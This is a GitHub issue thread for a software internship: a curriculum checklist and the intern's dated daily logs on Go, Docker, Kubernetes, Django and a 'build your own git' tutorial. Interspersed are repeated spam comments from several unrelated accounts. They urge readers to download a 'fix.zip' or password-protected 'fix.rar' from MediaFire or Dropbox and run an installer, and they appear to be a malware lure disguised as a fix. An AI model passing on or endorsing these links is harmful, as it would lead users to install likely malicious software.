### ISSUE TITLE
INTERNSHIP - MOHAMED FADEL

### ISSUE THREAD

**Issue by MohamedFadel01** [codescalersinternships/home#272]
## Week 0
- [ ] https://www.youtube.com/playlist?list=PLyzOVJj3bHQuloKGG59rS43e29ro7I57J ( lect 1-7)
- [ ] Effective Shell: https://effective-shell.com
- [ ] Linux Intro/Essentials https://lym.readthedocs.io/en/latest/
- [ ] Reading manpages of `echo, env, cat, wc, head, tail, yes, true, false, tree`
- [ ] git https://www.atlassian.com/git

### extra
- [ ] audit courses https://www.coursera.org/professional-certificates/google-it-support
- [ ] https://ubuntu.com/server/docs

## Week 1

- [ ] Go fundamentals 
- [ ] coreutils https://github.com/codescalersinternships/home/issues/105: `echo, env, cat, wc, head, tail, yes, true, false, tree` (use gobyexample to speed up things)
- [ ] [gobyexample](https://gobyexample.com)
- [ ] build your own git https://leshenko.net/p/ugit/# (5 steps)

## Week 2
- [ ] Testing fundamentals
- [ ] INI Parser project with tests https://github.com/codescalersinternships/home/issues/21
- [ ] Github workflows
- [ ] [learn with tests](https://quii.gitbook.io/learn-go-with-tests/)
- [ ] build your own git https://leshenko.net/p/ugit/# (5 steps)

### Extra
- [ ] [go101](https://go101.org/article/101.html)
- [ ] [ultimatego](https://github.com/hoanhan101/ultimate-go)

## Week 2

- [ ] Datetime server https://github.com/codescalersinternships/home/issues/144
- [ ] HTTP Service testing
- [ ] DateTime http client https://github.com/codescalersinternships/home/issues/145
- [ ] build your own git https://leshenko.net/p/ugit/# (5 steps)

## Week 3

- [ ] Docker
- [ ] Docker compose
- [ ] REST API
- [ ] Swagger
- [ ] Postman
- [ ] pokemon API https://pokeapi.co/ (create http client for pokemon API + tests) https://github.com/codescalersinternships/home/issues/146
- [ ] build your own git https://leshenko.net/p/ugit/# (5 steps)

## Week 4

- [ ] Secret Note MVC https://github.com/codescalersinternships/home/issues/153
- [ ] build your own git https://leshenko.net/p/ugit/# (5 steps)

## Week 5

- [ ] Secret Note API https://github.com/codescalersinternships/home/issues/152

## Week 6
- [ ] Frontend https://github.com/codescalersinternships/home/issues/152
- [ ] build your own git https://leshenko.net/p/ugit/# (5 steps)

## Week 7 (onboarding to threefold)
- [ ] Intro to Codescalers and TFGrid Platform
- [ ] How to write a bug report https://www.softwaretestinghelp.com/how-to-write-good-bug-report/
- [ ] Manual Testing 
- [ ] Namespaces, CGroups, Docker
- [ ] The Dashboard and deploying your first machine on the threefold grid)
- [ ] Terraform and deploying your virtual machines machines on the threefold grid)
- [ ] Rust fundamentals
- [ ] Manually Testing the platform (intro to testlodge -qa tool we use to develop and track our tests-)

## Week 8-end of internship week 10 distributed on teams (sdk-go, zos, sdk-ts, sdk-dart)

- [ ] 4 solutions
- [ ] GPU services integration *
- [ ] ZOS service rewrites in rust
- [ ] Freeflow twin
- [ ] Threefold Connect *
- [ ] Planetary Desktop/mobile App
- [ ] Increase code coverage
- [ ] Deployments web builder (drag/drop)
- [ ] IaC
- [ ] heroku like system on the grid maybe? gridify pushing forward

## Extras

- [ ] [bitcask paper](https://github.com/codescalersinternships/home/issues/37)
- [ ] Extra: RESP Parser
- [ ] NTP https://github.com/codescalersinternships/home/issues/141
- [ ] BMP Width/Height https://github.com/codescalersinternships/home/issues/142

## Sessions
- [ ] REST API
- [ ] GraphQL
- [ ] Protobuf
- [ ] gRPC
- [ ] Concurrency
- [ ] Blockchain
- [ ] Vue
- [ ] Docker/CGroups
- [ ] Testing
- [ ] Redis
- [ ] UNIX Programming
- [ ] Caddy
- [ ] Zinit
- [ ] Flist
- [ ] Raft
- [ ] Packer
- [ ] Zig
- [ ] TLS
- [ ] Encryption (symmetric/asymmetric)
- [ ] 12 factor apps https://12factor.net
- [ ] Github flow https://docs.github.com/en/get-started/quickstart/github-flow
- [ ] Building a small busybox based distro

## daily work 
- [ ] write your own git: https://leshenko.net/p/ugit/#
- [ ] [creating package in 2022](https://mathspp.com/blog/how-to-create-a-python-package-in-2022)
- [ ] [python](https://docs.python.org/3/tutorial/index.html)
- [ ] [django rest framework DRF](https://www.django-rest-framework.org/)
- [ ] [pymotw](https://pymotw.com/3/) 
- [ ] [jinja](https://jinja.palletsprojects.com/en/2.10.x/)
- [ ] [bottle](https://bottlepy.org/docs/dev/)
- [ ] [exploreflask](https://exploreflask.com/en/latest/)
- [ ] [flask megatuorial](https://blog.miguelgrinberg.com/post/the-flask-mega-tutorial-part-i-hello-world)
- [ ] [TDD with python/django](https://www.obeythetestinggoat.com)
- [ ] [redis university](https://university.redis.com)
- [ ] [redis in action](https://redislabs.com/redis-in-action/) is a book that will help you to know redis by practice.
- The following topics are important to know about Redis:
  - [ ] Data structures
  - [ ] Pub/Sub [Guide link 1](https://redis.io/topics/pubsub) | [Guide link 2](https://www.tutorialspoint.com/redis/redis_pub_sub.htm) | [Video](https://youtu.be/33N1mgiRYK0)
  - [ ] Data persistence (snapshots & AOF) [Guide link](https://redis.io/topics/persistence)  | [Video](https://youtu.be/Hbt56gFj998?t=2042)
  - [ ] Transactions [Guide link](https://www.tutorialspoint.com/redis/redis_transactions.htm)
  - [ ] Distributed locking [Guide link1](https://redis.io/topics/distlock) | [Guide link2](https://medium.com/@rohansaraf/distributed-locking-with-redis-ecb0773e7695)
  - [ ] Resp Protocol [Guide link](https://redis.io/topics/protocol)
### Software development process / testing

- [ ] Trunk based development https://trunkbaseddevelopment.com/

## networking
- [ ] [CCNA/CCNP](https://www.youtube.com/playlist?list=PL77yNtB4-LjnN2FU3h1v5hIJOHZfW9ugq)

## linux 
- [ ] effective shell: https://effective-shell.com
- [ ] [ubuntu server guide](https://help.ubuntu.com/lts/serverguide/)
- [ ] [nginx](https://www.nginx.com/)
- [ ] [debian handbook](https://debian-handbook.info)
- [ ] [tmux](https://www.hamvocke.com/blog/a-quick-and-easy-guide-to-tmux/)
- [ ] [building root filesystem](https://emreboy.wordpress.com/2012/12/20/building-a-root-file-system-using-busybox/)
- [ ] [coredns](https://coredns.io)
- [ ] https://www.nginx.com/blog/what-are-namespaces-cgroups-how-do-they-work/ 
- [ ] https://www.youtube.com/watch?v=8fi7uSYlOdc
- [ ] [build container in 500Lines](https://blog.lizzie.io/linux-containers-in-500-loc.html)
- [ ] [unix programming](https://stevens.netmeister.org/631/#syllabus)
- 
## Raft/Distributed systems
- [ ] https://learn.particular.net/courses/distributed-systems-design-fundamentals-online
- [ ] slides: https://thesecretlivesofdata.com/raft/
- [ ] https://raft.github.io
- [ ] https://en.wikipedia.org/wiki/Raft_(algorithm)

## binary serialization
- [ ] https://capnproto.org/
- [ ] https://google.github.io/flatbuffers/
- https://developers.google.com/protocol-buffers

## Optional:
- [ ] Kubernetes
- [ ] Helm Charts
- [ ] Blockchain (substrate, cosmos, solidity?)

**Comment by MohamedFadel01** [comment]
### 25-08-2024
- Studied the first lecture from the 'Missing Semester' playlist (Lecture 1: The Shell)
- Completed the section on shell commands from the tutorial available at lym.readthedocs.io.

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by MohamedFadel01** [comment]
### 26-08-2024
- Studied the second lecture from the 'Missing Semester' playlist (Lecture 2: Shell Tools and Scripting)

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MohamedFadel01** [comment]
### 27-08-2024
- Studied the third lecture from the 'Missing Semester' playlist ( Lecture 3: Editors (Vim) ).
- Finished reading the fourth lecture notes from the 'Missing Semester' playlist (Lecture 4: Data Wrangling).
- Finished reading the manpages of `wc`, `head` and `tail`.

**Comment by MohamedFadel01** [comment]
### 28-08-2024
- Studied the fifth lecture from the 'Missing Semester' playlist (Lecture 5: Command-line Environment).

**Comment by MohamedFadel01** [comment]
### 29-08-2024
- Studied the sixth lecture from the 'Missing Semester' playlist ( Lecture 6: Version Control (GIT) ).
- Finished reading the seventh lecture notes from the 'Missing Semester' playlist (Lecture 7: Debugging and Profiling).
- Finished studying Git (branches, commit, log, merge, rebase, tag, GitHub Flow)

**Comment by MohamedFadel01** [comment]
### 30-08-2024
- Completed the section of 'Useful commands' from the tutorial available at lym.readthedocs.io.
- Completed the section of 'Users and Groups' from the tutorial available at lym.readthedocs.io.
- Finished watching until (User and Group Management) from this tutorial: https://youtu.be/gojeTqXdBH0.

**Comment by MohamedFadel01** [comment]
### 31-08-2024
- Completed the sections of 'File System' and 'File permissions' from the tutorial available at lym.readthedocs.io.
- Completed the sections of 'Processes in Linux' and 'Linux Services' from the tutorial available at lym.readthedocs.io.
- Completed the section of 'Package Management (apt)' from the tutorial available at lym.readthedocs.io.
- Completed the section of 'Networking Commands' from the tutorial available at lym.readthedocs.io.
- Finished watching until (Connecting to Remote Servers (ssh, wget, curl, etc.) from this tutorial: https://youtu.be/gojeTqXdBH0

**Comment by MohamedFadel01** [comment]
### 01-09-2024
- Installed Go.
- Working on [gobyexample](https://gobyexample.com).
- Studied from [gobyexample](https://gobyexample.com) up to "Slices" section. 
- Completed two steps(1 & 2) of build your own git https://leshenko.net/p/ugit/#

**Comment by MohamedFadel01** [comment]
### 02-09-2024
- Studied from [gobyexample](https://gobyexample.com) from "Maps" to "Interfaces". 
- Implemented the `head` functionality - Coreutils task #278

**Comment by MohamedFadel01** [comment]
### 03-09-2024
- Attended a meeting with @AbdelrahmanElawady  to review my code.
- Changed the entire  project structure - [Coreutils](https://github.com/codescalersinternships/Coreutils-MohamedFadel/tree/development)
- Refactored almost everything - [Coreutils](https://github.com/codescalersinternships/Coreutils-MohamedFadel/tree/development)
- Added error handing logic - [Coreutils](https://github.com/codescalersinternships/Coreutils-MohamedFadel/tree/development)
- Finished reading this article - [How to Import Functions Across Files in a Go Project using Modules.](https://medium.com/@ansujain/how-to-import-functions-across-files-in-a-go-project-using-modules-13bb84f896e6)
- Implemented the `tail` functionality - Coreutils task #278

**Comment by MohamedFadel01** [comment]
### 04-09-2024
- Implemented the `wc` functionality - Coreutils task #278 
- Implemented the `cat` functionality - Coreutils task #278 
- Implemented the `echo` functionality - Coreutils task #278 
- Implemented the rest of - Coreutils task #278 
- Added github actions - Coreutils task #278

**Comment by MohamedFadel01** [comment]
### 05-09-2024
- Spend all day fixing errors related to github actions

**Comment by MohamedFadel01** [comment]
### 06-09-2024
- Completed this week's 5 steps of build your own git https://leshenko.net/p/ugit/#
- Completed watching first 10 videos from [The go testing bible course](https://tutorialedge.net/courses/go-testing-bible/01-course-overview/)

**Comment by MohamedFadel01** [comment]
### 07-09-2024
- Completed [learn Go with tests](https://quii.gitbook.io/learn-go-with-tests/) until Mocking - Didn't understand DI and Mocking :(.
- Completed reading the 1st chapter of [Software Design by Example](https://third-bit.com/sdxpy/intro/)

**Comment by MohamedFadel01** [comment]
### 08-09-2024
- Completed step 6 of [build your own git](https://leshenko.net/p/ugit/#)
- Modified Coreutils project according to review comments

**Comment by MohamedFadel01** [comment]
### 09-09-2024
- Working on #281 
- Almost completed #281 
- Completed step 7 of [build your own git](https://leshenko.net/p/ugit/#)

**Comment by MohamedFadel01** [comment]
### 10-09-2024
- Completed #281 except for API docs.
- Modified Coreutils project according to review comments (second round)
- Completed steps 8, 9 and 10 of [build your own git](https://leshenko.net/p/ugit/#)

**Comment by MohamedFadel01** [comment]
### 11-09-2024
- Completed reading from Github [Workflows](https://docs.github.com/en/actions/learn-github-actions/understanding-github-actions) untill "Using workflow templates" section.
- Modified Coreutils project according to review comments (third round).
- Studied some python

**Comment by MohamedFadel01** [comment]
### 12-09-2024
- Added API documentation to #281.
- Completed this [Python tutorial](https://youtu.be/EOLPQdVj5Ac?list=PLhQjrBD2T380xvFSUmToMMzERZ3qB5Ueu)
- Completed reading the 2nd chapter of [Software Design by Example](https://third-bit.com/sdxpy/oop/)

**Comment by MohamedFadel01** [comment]
### 13-09-2024
- Completed this [Django tutorial](https://youtu.be/rHux0gMZ3Eg).

**Comment by MohamedFadel01** [comment]
### 14-09-2024
- Completed reading HTTP Client & HTTP Server sections from gobyexample.

**Comment by MohamedFadel01** [comment]
### 15-09-2024
- Working on this [Docker course](https://learn.kodekloud.com/user/courses/docker-certified-associate-exam-course).
- Completed Introduction & Docker Engine modules from this [Docker course](https://learn.kodekloud.com/user/courses/docker-certified-associate-exam-course).
- Completed step 11 from [build your own git](https://leshenko.net/p/ugit/#)

**Comment by MohamedFadel01** [comment]
### 16-09-2024
- Implemented Stringer interface for #281 .
- Implemented Datetime server functionality and testing using `net/http` - #285 .
- Implemented Datetime server functionality and testing using `gin` framework - #285 .
- Completed step 12 from [build your own git](https://leshenko.net/p/ugit/#)

**Comment by MohamedFadel01** [comment]
### 17-09-2024
- Completed step 13 from [build your own git](https://leshenko.net/p/ugit/#)
- Restored internet connectivity and working on this [Docker course](https://learn.kodekloud.com/user/courses/docker-certified-associate-exam-course).
- Completed Docker Image Management module from this [Docker course](https://learn.kodekloud.com/user/courses/docker-certified-associate-exam-course).

**Comment by MohamedFadel01** [comment]
### 18-09-2024
- Completed refactoring #281 according to review comments.
- Completed 3 modules from this [Docker course](https://learn.kodekloud.com/user/courses/docker-certified-associate-exam-course).
- Completed step 14 from [build your own git](https://leshenko.net/p/ugit/#).

**Comment by MohamedFadel01** [comment]
### 19-09-2024
- Removed `testify` package and enabled sending json responses #285.
- Working on #293 
- Completed Docker Compose module from this [Docker course](https://learn.kodekloud.com/user/courses/docker-certified-associate-exam-course).
- Completed step 15 from [build your own git](https://leshenko.net/p/ugit/#).

**Comment by MohamedFadel01** [comment]
### Weekend
- Completed #285 
- Completed #293

**Comment by MohamedFadel01** [comment]
### 22-09-2024
- Studied some of this [Docker tutorial](https://youtu.be/PrusdhS2lmo).
- Started working on #297 
- Almost completed core functionality of #297 
- Completed step 16 from [build your own git](https://leshenko.net/p/ugit/#).

**Comment by MohamedFadel01** [comment]
### 23-09-2024
- Completed #297 
- Completed reading the 3rd chapter of [SW design by example](https://third-bit.com/sdxpy/dup/).
- Completed step 17 from [build your own git](https://leshenko.net/p/ugit/#).

**Comment by MohamedFadel01** [comment]
### 24-09-2024
- Got familiar with Swagger and Postman.
- Completed reading this [REST API article](https://www.ibm.com/topics/rest-apis#)
- Completed reading this [multi-stage builds article](https://fabianlee.org/2020/01/26/golang-using-multi-stage-builds-to-create-clean-docker-images/).
- Completed reading the 4th & 5th chapters of [SW design by example](https://third-bit.com/sdxpy/glob/).
- Completed steps 18, 19 & 20 from [build your own git](https://leshenko.net/p/ugit/#).

**Comment by MohamedFadel01** [comment]
### 25-09-2024
- Getting more familiar with docker from this [tutorial](https://www.youtube.com/watch?v=PrusdhS2lmo&t=11s).

**Comment by MohamedFadel01** [comment]
### 26-09-2024
- Completed up to docker compose from this [tutorial](https://www.youtube.com/watch?v=PrusdhS2lmo&t=11s).
- Navigating some CGroups/Namespaces resources to get myself familiar with the concept

**Comment by MohamedFadel01** [comment]
### Weekend
- Prepared for the upcoming session and crafted a presentaion.

**Comment by MohamedFadel01** [comment]
### 29-09-2024
- Completed the presentaion and got some review comments on it (will apply them later)
- Completed this [tutorial](https://www.youtube.com/watch?v=PrusdhS2lmo&t=11s) starting from docker swarm till the end.

**Comment by MohamedFadel01** [comment]
### 01-10-2024
- Learning k8s from this [tutorial](https://www.youtube.com/watch?v=X48VuDVv0do).
- Learning how to deploy to a cluster from this [tutorial](https://www.freecodecamp.org/news/deploy-docker-image-to-kubernetes/).

**Comment by MohamedFadel01** [comment]
### 02-10-2024
- Completed this [tutorial](https://www.freecodecamp.org/news/deploy-docker-image-to-kubernetes/).
- Deployed datetime http servers using `deployment` and `service` yaml files.
- Completed learning about k8s from this [tutorial](https://www.youtube.com/watch?v=X48VuDVv0do) up to "Persisting Data in K8s with Volumes" section.
- Completed reading [this helm tutorial](https://www.freecodecamp.org/news/what-is-a-helm-chart-tutorial-for-kubernetes-beginners/).
- Packaged my project with helm charts, removed old deploymets and services and deployed again using helm.
- Applied review comments on #285 and #293

**Comment by MohamedFadel01** [comment]
### 03-10-2024
- Completed 5 steps of [build your own git](https://leshenko.net/p/ugit/#).

**Comment by MohamedFadel01** [comment]
### Weekend
- Worked on #302

**Comment by MohamedFadel01** [comment]
### (07-10❤️🇵🇸)-2024
- Completed reading this [MVC article](https://www.geeksforgeeks.org/mvc-design-pattern/).
- Started working on #301 
- Completed reading this [Django ModelForm article](https://www.geeksforgeeks.org/django-modelform-create-form-from-models/).
- Completed steps 26 & 27 of [build your own git](https://leshenko.net/p/ugit/#).

**Comment by MohamedFadel01** [comment]
### 08-10-2024
- Working on #301.
- Watched this [Rate Limiting tutorial](https://www.youtube.com/watch?v=OaApE-J3rC0&ab_channel=CloudWithDjango) and read about [Status 429](https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/429).
- Completed reading this [Django Testing Tutorial](https://alicecampkin.medium.com/django-testing-for-beginners-146bd285a178).

**Comment by MohamedFadel01** [comment]
### 09-10-2024
- Completed this [adding static files tutorial](https://www.w3schools.com/django/django_add_css_file.php/django_add_static_files.php) and applied it in #301.
- Learned about [how to create custom middleware in django](https://vincentlossel.medium.com/how-to-create-a-custom-middleware-with-django-2ce1da6db07).
- Learned about [Django's built-in user model](https://www.geeksforgeeks.org/how-to-use-user-model-in-django/).

**Comment by MohamedFadel01** [comment]
### 10-10-2024
- Completed unit and integration testing of #301.
- Got myself familiar with Selenium following along [this tutorial](https://medium.com/@moraneus/guide-to-using-python-selenium-873342d5fdad).

**Comment by MohamedFadel01** [comment]
### 13-10-2024
- Completed steps 28, 29 and 30 of [build your own git](https://leshenko.net/p/ugit/#).
- I presented at the office on Namespaces and Cgroups, explaining their role in Docker.

**Comment by MohamedFadel01** [comment]
### 14-10-2024
- Worked on deploying #301.

**Comment by MohamedFadel01** [comment]
### 15-10-2024
- Completed #301.

**Comment by MohamedFadel01** [comment]
### 16-10-2024
- Completed #302.

**Comment by MohamedFadel01** [comment]
### 17-10-2024
- Started working on #311.

**Comment by MohamedFadel01** [comment]
### Weekend
- Completed User Service - #311.

**Comment by MohamedFadel01** [comment]
### 20-10-2024
- Completed User Handlers and started working on Link Service & Handlers - #311.

**Comment by MohamedFadel01** [comment]
### 21-10-2024
- Completed the services and handlers for links and analytics - #311.

**Comment by MohamedFadel01** [comment]
### 22-10-2024
- Added routing and Swagger documentation - #311.

**Comment by MohamedFadel01** [comment]
### 23-10-2024
- Added testing, dockerized the API and created a README for the API - #311.
